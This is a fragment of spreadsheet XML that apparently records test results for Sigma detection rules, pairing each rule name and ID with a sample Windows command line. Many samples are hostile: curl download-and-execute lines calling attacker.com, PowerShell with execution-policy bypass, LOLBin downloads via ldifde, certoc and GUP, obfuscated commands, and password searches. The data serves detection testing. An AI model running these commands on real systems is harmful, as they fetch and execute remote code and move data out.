          <t>proc_creation_win_cmd_type_arbitrary_file_download</t>
        </is>
      </c>
      <c r="C439" s="43" t="inlineStr">
        <is>
          <t>Potential Download/Upload Activity Using Type Command</t>
        </is>
      </c>
      <c r="D439" s="43" t="inlineStr">
        <is>
          <t>aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f</t>
        </is>
      </c>
      <c r="E439" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c t^y^p^e C:\temp\data.txt &gt; \\webdav.server.local\share\data.txt</t>
        </is>
      </c>
      <c r="F439" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G439" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H439" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I439" s="43" t="n"/>
      <c r="J439" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K439" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="440" ht="15.75" customHeight="1" s="42">
      <c r="A440" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B440" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_gup_download</t>
        </is>
      </c>
      <c r="C440" s="43" t="inlineStr">
        <is>
          <t>File Download Using Notepad++ GUP Utility</t>
        </is>
      </c>
      <c r="D440" s="43" t="inlineStr">
        <is>
          <t>44143844-0631-49ab-97a0-96387d6b2d7c</t>
        </is>
      </c>
      <c r="E440" s="43" t="inlineStr">
        <is>
          <t>GUP.exe -unzipTo C:\Temp h t t p : / / example.com/payload.zip</t>
        </is>
      </c>
      <c r="F440" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G440" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H440" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I440" s="43" t="n"/>
      <c r="J440" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K440" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="441" ht="15.75" customHeight="1" s="42">
      <c r="A441" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B441" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_gup_download</t>
        </is>
      </c>
      <c r="C441" s="43" t="inlineStr">
        <is>
          <t>File Download Using Notepad++ GUP Utility</t>
        </is>
      </c>
      <c r="D441" s="43" t="inlineStr">
        <is>
          <t>44143844-0631-49ab-97a0-96387d6b2d7c</t>
        </is>
      </c>
      <c r="E441" s="43" t="inlineStr">
        <is>
          <t>GUP.exe -unzipTo=C:\Temp $env:url</t>
        </is>
      </c>
      <c r="F441" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G441" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H441" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I441" s="43" t="n"/>
      <c r="J441" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K441" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="442" ht="15.75" customHeight="1" s="42">
      <c r="A442" s="43" t="inlineStr">
        <is>
          <t>t1102</t>
        </is>
      </c>
      <c r="B442" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_tunnel_cleanup</t>
        </is>
      </c>
      <c r="C442" s="43" t="inlineStr">
        <is>
          <t>Cloudflared Tunnel Connections Cleanup</t>
        </is>
      </c>
      <c r="D442" s="43" t="inlineStr">
        <is>
          <t>7050bba1-1aed-454e-8f73-3f46f09ce56a</t>
        </is>
      </c>
      <c r="E442" s="43" t="inlineStr">
        <is>
          <t>cloudflared tunnel cleanup --config="C:\temp\config.yml"</t>
        </is>
      </c>
      <c r="F442" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G442" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H442" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I442" s="43" t="n"/>
      <c r="J442" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K442" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="443" ht="15.75" customHeight="1" s="42">
      <c r="A443" s="43" t="inlineStr">
        <is>
          <t>t1102</t>
        </is>
      </c>
      <c r="B443" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_tunnel_cleanup</t>
        </is>
      </c>
      <c r="C443" s="43" t="inlineStr">
        <is>
          <t>Cloudflared Tunnel Connections Cleanup</t>
        </is>
      </c>
      <c r="D443" s="43" t="inlineStr">
        <is>
          <t>7050bba1-1aed-454e-8f73-3f46f09ce56a</t>
        </is>
      </c>
      <c r="E443" s="43" t="inlineStr">
        <is>
          <t>cloudflared.exe tunnel cleanup -config=C:\temp\config.yml</t>
        </is>
      </c>
      <c r="F443" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G443" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H443" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I443" s="43" t="n"/>
      <c r="J443" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K443" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="444" ht="15.75" customHeight="1" s="42">
      <c r="A444" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B444" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C444" s="43" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D444" s="43" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E444" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c curl.exe http://example.com/payload.exe -o payload.exe &amp; .\payload.exe</t>
        </is>
      </c>
      <c r="F444" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G444" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H444" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I444" s="43" t="n"/>
      <c r="J444" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K444" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="445" ht="15.75" customHeight="1" s="42">
      <c r="A445" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B445" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C445" s="43" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D445" s="43" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E445" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c curl http://example.com/payload.exe &gt; payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F445" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G445" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H445" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I445" s="43" t="n"/>
      <c r="J445" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K445" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="446" ht="15.75" customHeight="1" s="42">
      <c r="A446" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B446" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C446" s="43" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D446" s="43" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E446" s="43" t="inlineStr">
        <is>
          <t>curl -s http://attacker.com/payload.ps1 --output payload.ps1 ; powershell -ExecutionPolicy Bypass -File payload.ps1</t>
        </is>
      </c>
      <c r="F446" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G446" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H446" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I446" s="43" t="n"/>
      <c r="J446" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K446" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="447" ht="15.75" customHeight="1" s="42">
      <c r="A447" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B447" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C447" s="43" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D447" s="43" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E447" s="43" t="inlineStr">
        <is>
          <t>curl http://attacker.com/payload.exe -o payload.exe &amp;&amp; payload.exe</t>
        </is>
      </c>
      <c r="F447" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G447" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H447" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I447" s="43" t="n"/>
      <c r="J447" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K447" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="448" ht="15.75" customHeight="1" s="42">
      <c r="A448" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B448" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C448" s="43" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D448" s="43" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E448" s="43" t="inlineStr">
        <is>
          <t>curl http://attacker.com/payload.exe -o payload.exe &amp; .\payload.exe</t>
        </is>
      </c>
      <c r="F448" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G448" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H448" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I448" s="43" t="n"/>
      <c r="J448" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K448" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="449" ht="15.75" customHeight="1" s="42">
      <c r="A449" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B449" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C449" s="43" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D449" s="43" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E449" s="43" t="inlineStr">
        <is>
          <t>curl http://attacker.com/payload.exe -o payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F449" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G449" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H449" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I449" s="43" t="n"/>
      <c r="J449" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K449" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="450" ht="15.75" customHeight="1" s="42">
      <c r="A450" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B450" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C450" s="43" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D450" s="43" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E450" s="43" t="inlineStr">
        <is>
          <t>curl http://attacker.com/payload.exe -o p.exe &amp; p.exe</t>
        </is>
      </c>
      <c r="F450" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G450" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H450" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I450" s="43" t="n"/>
      <c r="J450" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K450" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="451" ht="15.75" customHeight="1" s="42">
      <c r="A451" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B451" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C451" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D451" s="43" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E451" s="43" t="inlineStr">
        <is>
          <t>findstr /v /l . "\\192.168.1.100\share\payload.txt"</t>
        </is>
      </c>
      <c r="F451" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G451" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H451" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I451" s="43" t="n"/>
      <c r="J451" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K451" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="452" ht="15.75" customHeight="1" s="42">
      <c r="A452" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B452" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C452" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D452" s="43" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E452" s="43" t="inlineStr">
        <is>
          <t>findstr -v -l . "\\192\.168\.1\.100\share\payload.txt"</t>
        </is>
      </c>
      <c r="F452" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G452" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H452" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I452" s="43" t="n"/>
      <c r="J452" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K452" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="453" ht="15.75" customHeight="1" s="42">
      <c r="A453" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B453" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C453" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D453" s="43" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E453" s="43" t="inlineStr">
        <is>
          <t>findstr -v -l . "\\192.168.1.100\share\payload.txt" &gt; NUL</t>
        </is>
      </c>
      <c r="F453" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G453" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H453" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I453" s="43" t="n"/>
      <c r="J453" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K453" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="454" ht="15.75" customHeight="1" s="42">
      <c r="A454" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B454" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C454" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D454" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E454" s="43" t="inlineStr">
        <is>
          <t>copy findstr.exe fstr.exe &amp;&amp; fstr.exe /s /i "password" .</t>
        </is>
      </c>
      <c r="F454" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G454" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H454" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I454" s="43" t="n"/>
      <c r="J454" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K454" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="455" ht="15.75" customHeight="1" s="42">
      <c r="A455" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B455" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C455" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D455" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E455" s="43" t="inlineStr">
        <is>
          <t>findstr "password" . /s /i</t>
        </is>
      </c>
      <c r="F455" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G455" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H455" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I455" s="43" t="n"/>
      <c r="J455" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K455" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="456" ht="15.75" customHeight="1" s="42">
      <c r="A456" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B456" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ldifde_file_load</t>
        </is>
      </c>
      <c r="C456" s="43" t="inlineStr">
        <is>
          <t>Import LDAP Data Interchange Format File Via Ldifde.EXE</t>
        </is>
      </c>
      <c r="D456" s="43" t="inlineStr">
        <is>
          <t>6f535e01-ca1f-40be-ab8d-45b19c0c8b7f</t>
        </is>
      </c>
      <c r="E456" s="43" t="inlineStr">
        <is>
          <t>ldifde.exe -i -f "http://attacker.com/payload.ldf" -u</t>
        </is>
      </c>
      <c r="F456" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G456" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H456" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I456" s="43" t="n"/>
      <c r="J456" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K456" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="457" ht="15.75" customHeight="1" s="42">
      <c r="A457" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B457" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ldifde_file_load</t>
        </is>
      </c>
      <c r="C457" s="43" t="inlineStr">
        <is>
          <t>Import LDAP Data Interchange Format File Via Ldifde.EXE</t>
        </is>
      </c>
      <c r="D457" s="43" t="inlineStr">
        <is>
          <t>6f535e01-ca1f-40be-ab8d-45b19c0c8b7f</t>
        </is>
      </c>
      <c r="E457" s="43" t="inlineStr">
        <is>
          <t>ldifde.exe /i /f http://attacker.com/payload.ldf</t>
        </is>
      </c>
      <c r="F457" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G457" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H457" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I457" s="43" t="n"/>
      <c r="J457" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K457" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="458" ht="15.75" customHeight="1" s="42">
      <c r="A458" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B458" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_exec</t>
        </is>
      </c>
      <c r="C458" s="43" t="inlineStr">
        <is>
          <t>Browser Execution In Headless Mode</t>
        </is>
      </c>
      <c r="D458" s="43" t="inlineStr">
        <is>
          <t>ef9dcfed-690c-4c5d-a9d1-482cd422225c</t>
        </is>
      </c>
      <c r="E458" s="43" t="inlineStr">
        <is>
          <t>copy msedge.exe not_a_browser.exe &amp;&amp; not_a_browser.exe --headless</t>
        </is>
      </c>
      <c r="F458" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G458" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H458" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I458" s="43" t="n"/>
      <c r="J458" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K458" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="459" ht="15.75" customHeight="1" s="42">
      <c r="A459" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B459" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_exec</t>
        </is>
      </c>
      <c r="C459" s="43" t="inlineStr">
        <is>
          <t>Browser Execution In Headless Mode</t>
        </is>
      </c>
      <c r="D459" s="43" t="inlineStr">
        <is>
          <t>ef9dcfed-690c-4c5d-a9d1-482cd422225c</t>
        </is>
      </c>
      <c r="E459" s="43" t="inlineStr">
        <is>
          <t>msedge.exe --headless=old</t>
        </is>
      </c>
      <c r="F459" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G459" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H459" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I459" s="43" t="n"/>
      <c r="J459" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K459" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="460" ht="15.75" customHeight="1" s="42">
      <c r="A460" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B460" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_exec</t>
        </is>
      </c>
      <c r="C460" s="43" t="inlineStr">
        <is>
          <t>Browser Execution In Headless Mode</t>
        </is>
      </c>
      <c r="D460" s="43" t="inlineStr">
        <is>
          <t>ef9dcfed-690c-4c5d-a9d1-482cd422225c</t>
        </is>
      </c>
      <c r="E460" s="43" t="inlineStr">
        <is>
          <t>set "FLAG=--headless" &amp;&amp; msedge.exe %FLAG%</t>
        </is>
      </c>
      <c r="F460" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G460" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H460" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I460" s="43" t="n"/>
      <c r="J460" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K460" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="461" ht="15.75" customHeight="1" s="42">
      <c r="A461" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B461" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_file_download</t>
        </is>
      </c>
      <c r="C461" s="43" t="inlineStr">
        <is>
          <t>File Download with Headless Browser</t>
        </is>
      </c>
      <c r="D461" s="43" t="inlineStr">
        <is>
          <t>0e8cfe08-02c9-4815-a2f8-0d157b7ed33e</t>
        </is>
      </c>
      <c r="E461" s="43" t="inlineStr">
        <is>
          <t>chromium.exe --headless --dump-dom http://example.com/payload.txt</t>
        </is>
      </c>
      <c r="F461" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G461" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H461" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I461" s="43" t="n"/>
      <c r="J461" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K461" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="462" ht="15.75" customHeight="1" s="42">
      <c r="A462" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B462" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_inline_file_download</t>
        </is>
      </c>
      <c r="C462" s="43" t="inlineStr">
        <is>
          <t>File Download From Browser Process Via Inline URL</t>
        </is>
      </c>
      <c r="D462" s="43" t="inlineStr">
        <is>
          <t>94771a71-ba41-4b6e-a757-b531372eaab6</t>
        </is>
      </c>
      <c r="E462" s="43" t="inlineStr">
        <is>
          <t>msedge.exe http://example.com/payload.exe --window-size=800,600</t>
        </is>
      </c>
      <c r="F462" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G462" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H462" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I462" s="43" t="n"/>
      <c r="J462" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K462" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="463" ht="15.75" customHeight="1" s="42">
      <c r="A463" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B463" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_download</t>
        </is>
      </c>
      <c r="C463" s="43" t="inlineStr">
        <is>
          <t>File Download via CertOC.EXE</t>
        </is>
      </c>
      <c r="D463" s="43" t="inlineStr">
        <is>
          <t>70ad0861-d1fe-491c-a45f-fa48148a300d</t>
        </is>
      </c>
      <c r="E463" s="43" t="inlineStr">
        <is>
          <t>certoc.exe /GetCACAPS http://example.com/payload.dll</t>
        </is>
      </c>
      <c r="F463" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G463" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H463" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I463" s="43" t="n"/>
      <c r="J463" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K463" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="464" ht="15.75" customHeight="1" s="42">
      <c r="A464" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B464" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_download</t>
        </is>
      </c>
      <c r="C464" s="43" t="inlineStr">
        <is>
          <t>File Download via CertOC.EXE</t>
        </is>
      </c>
      <c r="D464" s="43" t="inlineStr">
        <is>
          <t>70ad0861-d1fe-491c-a45f-fa48148a300d</t>
        </is>
      </c>
      <c r="E464" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "certoc.exe -GetCACAPS h^t^t^p^:^/^/http://example.com/payload.dll"</t>
        </is>
      </c>
      <c r="F464" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G464" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H464" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I464" s="43" t="n"/>
      <c r="J464" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K464" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="465" ht="15.75" customHeight="1" s="42">
      <c r="A465" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B465" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_type_arbitrary_file_download</t>
        </is>
      </c>
      <c r="C465" s="43" t="inlineStr">
        <is>
          <t>Potential Download/Upload Activity Using Type Command</t>
        </is>
      </c>
      <c r="D465" s="43" t="inlineStr">
        <is>
          <t>aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f</t>
        </is>
      </c>
      <c r="E465" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c set "cmd=type" &amp;&amp; call %cmd% \\webdav.server.local\share\file.txt &gt; C:\temp\file.txt</t>
        </is>
      </c>
      <c r="F465" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G465" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H465" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I465" s="43" t="n"/>
      <c r="J465" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K465" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="466" ht="15.75" customHeight="1" s="42">
      <c r="A466" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B466" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_type_arbitrary_file_download</t>
        </is>
      </c>
      <c r="C466" s="43" t="inlineStr">
        <is>
          <t>Potential Download/Upload Activity Using Type Command</t>
        </is>
      </c>
      <c r="D466" s="43" t="inlineStr">
        <is>
          <t>aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f</t>
        </is>
      </c>
      <c r="E466" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c type C:\temp\data.txt &gt;\\webdav.server.local\share\data.txt</t>
        </is>
      </c>
      <c r="F466" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G466" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H466" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I466" s="43" t="n"/>
      <c r="J466" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K466" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="467" ht="15.75" customHeight="1" s="42">
      <c r="A467" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B467" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_susp_download</t>
        </is>
      </c>
      <c r="C467" s="43" t="inlineStr">
        <is>
          <t>Suspicious Curl.EXE Download</t>
        </is>
      </c>
      <c r="D467" s="43" t="inlineStr">
        <is>
          <t>e218595b-bbe7-4ee5-8a96-f32a24ad3468</t>
        </is>
      </c>
      <c r="E467" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o C:\Users\Public\Music\allthethingsx64.dll</t>
        </is>
      </c>
      <c r="F467" s="43" t="b">
        <v>0</v>
      </c>
